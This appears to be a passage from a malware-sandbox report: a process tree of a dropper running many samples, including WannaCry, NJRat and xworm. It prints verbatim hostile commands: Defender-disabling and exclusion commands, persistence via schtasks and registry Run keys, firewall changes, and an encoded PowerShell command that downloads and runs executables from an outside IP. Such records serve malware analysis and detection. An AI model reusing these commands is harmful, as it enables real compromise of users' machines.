    "C:\Users\Admin\Desktop\Files\mrdgasdthawed.exe"
    3⤵
    PID:33256
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xx73O4kZgs.bat"
      4⤵
      PID:55416
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:37484
    - - C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        5⤵
        
        PID:49276
- - C:\Users\Admin\Desktop\Files\444.exe
    "C:\Users\Admin\Desktop\Files\444.exe"
    3⤵
    PID:6812
- - C:\Users\Admin\Desktop\Files\testingfile.exe
    "C:\Users\Admin\Desktop\Files\testingfile.exe"
    3⤵
    PID:38360

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2292

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:476
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:2144
- - C:\Users\Admin\Desktop\Files\evetbeta.exe
    "C:\Users\Admin\Desktop\Files\evetbeta.exe"
    3⤵
    PID:7028
- - C:\Users\Admin\Desktop\Files\spectrum.exe
    "C:\Users\Admin\Desktop\Files\spectrum.exe"
    3⤵
    PID:7396
  - - C:\Users\Admin\Desktop\Files\._cache_spectrum.exe
      "C:\Users\Admin\Desktop\Files\._cache_spectrum.exe"
      4⤵
      PID:3328
    - - C:\Users\Admin\Desktop\Files\Files\dxwebsetup.exe
        
        "C:\Users\Admin\Desktop\Files\Files\dxwebsetup.exe"
        5⤵
        
        PID:37808
      - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
        6⤵
        
        PID:44972
    - - C:\Users\Admin\Desktop\Files\Files\AsyncClient.exe
        
        "C:\Users\Admin\Desktop\Files\Files\AsyncClient.exe"
        5⤵
        
        PID:15236
    - - C:\Users\Admin\Desktop\Files\Files\OLDxTEAM.exe
        
        "C:\Users\Admin\Desktop\Files\Files\OLDxTEAM.exe"
        5⤵
        
        PID:21880
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 21880 -s 748
        6⤵
        Program crash
        
        PID:27064
    - - C:\Users\Admin\Desktop\Files\Files\Charter.exe
        
        "C:\Users\Admin\Desktop\Files\Files\Charter.exe"
        5⤵
        
        PID:62304
    - - C:\Users\Admin\Desktop\Files\Files\uu.exe
        
        "C:\Users\Admin\Desktop\Files\Files\uu.exe"
        5⤵
        
        PID:37276
    - - C:\Users\Admin\Desktop\Files\Files\spectrum.exe
        
        "C:\Users\Admin\Desktop\Files\Files\spectrum.exe"
        5⤵
        
        PID:36608
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\Desktop\Files\Files\spectrum.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:39436
- - C:\Users\Admin\Desktop\Files\Steanings.exe
    "C:\Users\Admin\Desktop\Files\Steanings.exe"
    3⤵
    PID:8080
- - C:\Users\Admin\Desktop\Files\image%20logger.exe
    "C:\Users\Admin\Desktop\Files\image%20logger.exe"
    3⤵
    PID:9232
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "syteam" /tr '"C:\Users\Admin\AppData\Local\Temp\syteam.exe"' & exit
      4⤵
      PID:22892
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "syteam" /tr '"C:\Users\Admin\AppData\Local\Temp\syteam.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:11136
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5267.tmp.bat""
      4⤵
      PID:23464
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:29988
- - C:\Users\Admin\Desktop\Files\benpolatalemdar.exe
    "C:\Users\Admin\Desktop\Files\benpolatalemdar.exe"
    3⤵
    PID:7648
  - - C:\Users\Admin\Desktop\Files\._cache_benpolatalemdar.exe
      "C:\Users\Admin\Desktop\Files\._cache_benpolatalemdar.exe"
      4⤵
      PID:32360
    - - C:\Users\Admin\Desktop\Files\Files\Microsoft_Hardware_Launch.exe
        
        "C:\Users\Admin\Desktop\Files\Files\Microsoft_Hardware_Launch.exe"
        5⤵
        
        PID:33584
- - C:\Users\Admin\Desktop\Files\black.exe
    "C:\Users\Admin\Desktop\Files\black.exe"
    3⤵
    PID:32376
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\black.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\black.exe"
      4⤵
      PID:60560
- - C:\Users\Admin\Desktop\Files\builder.exe
    "C:\Users\Admin\Desktop\Files\builder.exe"
    3⤵
    PID:44712
- - C:\Users\Admin\Desktop\Files\WannaCry.exe
    "C:\Users\Admin\Desktop\Files\WannaCry.exe"
    3⤵
    PID:18820
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h .
      4⤵
      Views/modifies file attributes
      PID:60092
  - - C:\Windows\SysWOW64\icacls.exe
      icacls . /grant Everyone:F /T /C /Q
      4⤵
      Modifies file permissions
      PID:52136
  - - C:\Users\Admin\Desktop\Files\taskdl.exe
      taskdl.exe
      4⤵
      PID:17040
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 207891737398388.bat
      4⤵
      PID:20612
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s F:\$RECYCLE
      4⤵
      Views/modifies file attributes
      PID:59388
  - - C:\Users\Admin\Desktop\Files\taskdl.exe
      taskdl.exe
      4⤵
      PID:31224
  - - C:\Users\Admin\Desktop\Files\taskdl.exe
      taskdl.exe
      4⤵
      PID:38580
  - - C:\Users\Admin\Desktop\Files\@[email protected]
      @[email protected] co
      4⤵
      PID:48968
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c start /b @[email protected] vs
      4⤵
      PID:48840
  - - C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "ykbbwuyjdr767" /t REG_SZ /d "\"C:\Users\Admin\Desktop\Files\tasksche.exe\"" /f
      4⤵
      PID:46884
- - C:\Users\Admin\Desktop\Files\Macro2.exe
    "C:\Users\Admin\Desktop\Files\Macro2.exe"
    3⤵
    PID:43488
- - C:\Users\Admin\Desktop\Files\microsoft-onedrive.exe
    "C:\Users\Admin\Desktop\Files\microsoft-onedrive.exe"
    3⤵
    PID:3304
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYwBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAZwBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwB5ACMAPgA="
      4⤵
      PID:12772
  - - C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      PID:37540
    - - C:\Users\Admin\AppData\Local\Temp\Built.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        5⤵
        
        PID:50408
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        6⤵
        
        PID:47752
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        6⤵
        
        PID:47716
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:50380
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:50084
  - - C:\Users\Admin\AppData\Local\Temp\onedrive.exe
      "C:\Users\Admin\AppData\Local\Temp\onedrive.exe"
      4⤵
      PID:45136
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:50288
- - C:\Users\Admin\Desktop\Files\upm2008.exe
    "C:\Users\Admin\Desktop\Files\upm2008.exe"
    3⤵
    PID:49588

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4780
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:960
- - C:\Users\Admin\Desktop\Files\wudi.exe
    "C:\Users\Admin\Desktop\Files\wudi.exe"
    3⤵
    PID:52180
- - C:\Users\Admin\Desktop\Files\executablelol.exe
    "C:\Users\Admin\Desktop\Files\executablelol.exe"
    3⤵
    PID:30836
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "ctfmon" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:33476

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:3280
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:1796
- - C:\Users\Admin\Desktop\Files\Discordd.exe
    "C:\Users\Admin\Desktop\Files\Discordd.exe"
    3⤵
    PID:7348
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit
      4⤵
      PID:48212
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:22580
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD20C.tmp.bat""
      4⤵
      PID:52036
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:65972
    - - C:\Users\Admin\AppData\Roaming\Discord.exe
        
        "C:\Users\Admin\AppData\Roaming\Discord.exe"
        5⤵
        
        PID:41632
- - C:\Users\Admin\Desktop\Files\crypted.exe
    "C:\Users\Admin\Desktop\Files\crypted.exe"
    3⤵
    PID:13464
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:26328
- - C:\Users\Admin\Desktop\Files\fern_wifi_recon%252.34.exe
    "C:\Users\Admin\Desktop\Files\fern_wifi_recon%252.34.exe"
    3⤵
    PID:11804
- - C:\Users\Admin\Desktop\Files\NoEscape.exe
    "C:\Users\Admin\Desktop\Files\NoEscape.exe"
    3⤵
    PID:24728
- - C:\Users\Admin\Desktop\Files\SGVP%20Client%20program.exe
    "C:\Users\Admin\Desktop\Files\SGVP%20Client%20program.exe"
    3⤵
    PID:9292

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:572
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:4872
- - C:\Users\Admin\Desktop\Files\NJRat.exe
    "C:\Users\Admin\Desktop\Files\NJRat.exe"
    3⤵
    PID:5524
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\NJRat.exe" "NJRat.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:7656
- - C:\Users\Admin\Desktop\Files\GOLD.exe
    "C:\Users\Admin\Desktop\Files\GOLD.exe"
    3⤵
    PID:7828
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 7828 -s 776
      4⤵
      Program crash
      PID:6752
- - C:\Users\Admin\Desktop\Files\fsyjawdr.exe
    "C:\Users\Admin\Desktop\Files\fsyjawdr.exe"
    3⤵
    PID:37836
- - C:\Users\Admin\Desktop\Files\Terminal_9235.exe
    "C:\Users\Admin\Desktop\Files\Terminal_9235.exe"
    3⤵
    PID:43640
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "client" /tr '"C:\Users\Admin\AppData\Roaming\client.exe"' & exit
      4⤵
      PID:34692
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "client" /tr '"C:\Users\Admin\AppData\Roaming\client.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:38720
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD7A4.tmp.bat""
      4⤵
      PID:33744
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:35548
    - - C:\Users\Admin\AppData\Roaming\client.exe
        
        "C:\Users\Admin\AppData\Roaming\client.exe"
        5⤵
        
        PID:38856
- - C:\Users\Admin\Desktop\Files\Extension-tcp.exe
    "C:\Users\Admin\Desktop\Files\Extension-tcp.exe"
    3⤵
    PID:14388
- - C:\Users\Admin\Desktop\Files\startup.exe
    "C:\Users\Admin\Desktop\Files\startup.exe"
    3⤵
    PID:13400

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
PID:4600
- C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe
  "C:\Users\Admin\Desktop\._cache_4363463463464363463463463.exe"
  2⤵
  PID:3164
- - C:\Users\Admin\Desktop\Files\retest.exe
    "C:\Users\Admin\Desktop\Files\retest.exe"
    3⤵
    PID:5696
  - - C:\Users\Admin\Desktop\Files\._cache_retest.exe
      "C:\Users\Admin\Desktop\Files\._cache_retest.exe"
      4⤵
      PID:5640
    - - C:\Users\Admin\Desktop\Files\Files\kfhtksfesek.exe
        
        "C:\Users\Admin\Desktop\Files\Files\kfhtksfesek.exe"
        5⤵
        
        PID:7580
    - - C:\Users\Admin\Desktop\Files\Files\XClient.exe
        
        "C:\Users\Admin\Desktop\Files\Files\XClient.exe"
        5⤵
        
        PID:9428
    - - C:\Users\Admin\Desktop\Files\Files\SharpHound.exe
        
        "C:\Users\Admin\Desktop\Files\Files\SharpHound.exe"
        5⤵
        
        PID:11796
- - C:\Users\Admin\Desktop\Files\856.exe
    "C:\Users\Admin\Desktop\Files\856.exe"
    3⤵
    PID:7812
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\856.exe" "856.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:8644
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall delete allowedprogram "C:\Users\Admin\Desktop\Files\856.exe"
      4⤵
      Modifies Windows Firewall
      PID:9996
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Users\Admin\Desktop\Files\856.exe" "856.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:10004
  - - C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
      4⤵
      PID:9892
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:9072
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall delete allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"
        5⤵
        Modifies Windows Firewall
        
        PID:7984
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe" "svchost.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        
        PID:10088
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn StUpdate /tr C:\Users\Admin\AppData\Local\Temp/StUpdate.exe
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:9280
- - C:\Users\Admin\Desktop\Files\center.exe
    "C:\Users\Admin\Desktop\Files\center.exe"
    3⤵
    PID:8220
  - - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\CenterRun.exe
      4⤵
      PID:8700
    - - C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe
        
        "C:\Users\Admin\Documents\seetrol\center\SeetrolCenter.exe"
        5⤵
        
        PID:9468
- - C:\Users\Admin\Desktop\Files\Java32.exe
    "C:\Users\Admin\Desktop\Files\Java32.exe"
    3⤵
    PID:8688
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "java ©" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Programfiles\java.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:8548
- - C:\Users\Admin\Desktop\Files\xworm.exe
    "C:\Users\Admin\Desktop\Files\xworm.exe"
    3⤵
    PID:8580
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:8728
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAeQBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAbQBtACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABlAHIAcgBvAHIAIQAgAEYAaQBsAGUAIABtAHUAcwB0ACAAYgBlACAAcwB0AGEAcgB0AGUAZAAgAGEAcwAgAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIQAnACwAJwAnACwAJwBPAEsAJwAsACcARQByAHIAbwByACcAKQA8ACMAYwB1AGsAIwA+ADsAIgA7ADwAIwBsAG0AbQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAcQBsACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAZABrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAegB5ACMAPgA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AWQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAdgBqAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB6AGMAcAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB1AGIAZAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQApADwAIwB3AGwAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADAAOQAuADEANgAwAC4ANwAwAC8AYQB2AGQAaQBzAGEAYgBsAGUALgBiAGEAdAAnACwAIAA8ACMAZAB3AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGQAcwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB5AGwAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBBAHYAZABpAHMALgBiAGEAdAAnACkAKQA8ACMAcABmAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvADEAOAA1AC4AMgAwADkALgAxADYAMAAuADcAMAAvAEwAaQBjAGUAbgBzAGUAQwBoAGUAYwBrAGUAcgAuAGUAeABlACcALAAgADwAIwBiAHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAdgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAYQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApACkAPAAjAHEAdQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMAA5AC4AMQA2ADAALgA3ADAALwBQAEwAVgAuAGUAeABlACcALAAgADwAIwBrAGcAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAagB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAYgBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATABUAGUAcwB0AC4AZQB4AGUAJwApACkAPAAjAGEAaQBsACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGYAeQBqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHEAbQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAGkAYwBnAGUAdAAuAGUAeABlACcAKQA8ACMAcwB2AGYAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAZwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEEAdgBkAGkAcwAuAGIAYQB0ACcAKQA8ACMAagBpAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQByAG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAGUAbgBjAGUAQwBoAGUAYwBrAC4AZQB4AGUAJwApADwAIwB4AHcAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGMAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwBnAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAFQAZQBzAHQALgBlAHgAZQAnACkAPAAjAHoAZgBsACMAPgA="
        5⤵
        
        PID:6904
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
        6⤵
        
        PID:38272
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 8580 -s 248
      4⤵
      Program crash
      PID:9444
- - C:\Users\Admin\Desktop\Files\333.exe
    "C:\Users\Admin\Desktop\Files\333.exe"
    3⤵
    PID:9308
  - - C:\Users\Admin\Desktop\Files\._cache_333.exe
      "C:\Users\Admin\Desktop\Files\._cache_333.exe"
      4⤵
      PID:11376
    - - C:\Users\Admin\Desktop\Files\Files\cdb.exe
        
        "C:\Users\Admin\Desktop\Files\Files\cdb.exe"
        5⤵
        
        PID:13276
- - C:\Users\Admin\Desktop\Files\Fast%20Download.exe
    "C:\Users\Admin\Desktop\Files\Fast%20Download.exe"
    3⤵
    PID:9296
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
      4⤵
      Views/modifies file attributes
      PID:28108
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
      4⤵
      Views/modifies file attributes
      PID:28144
- - C:\Users\Admin\Desktop\Files\rh_0-8_2025-01-16_12-51.exe
    "C:\Users\Admin\Desktop\Files\rh_0-8_2025-01-16_12-51.exe"
    3⤵
    PID:11356
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 11356 -s 408
      4⤵
      Program crash
      PID:66284
- - C:\Users\Admin\Desktop\Files\CritScript.exe
    "C:\Users\Admin\Desktop\Files\CritScript.exe"
    3⤵
    PID:57452
  - - C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE
      "C:\Users\Admin\AppData\Local\Temp\JUSCHED.EXE"
      4⤵
      PID:22964
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Java Update Scheduler" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Java\jusched.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:27416
- - C:\Users\Admin\Desktop\Files\build.exe
    "C:\Users\Admin\Desktop\Files\build.exe"
    3⤵
    PID:10372
- - C:\Users\Admin\Desktop\Files\diskutil.exe
    "C:\Users\Admin\Desktop\Files\diskutil.exe"
    3⤵
    PID:40844
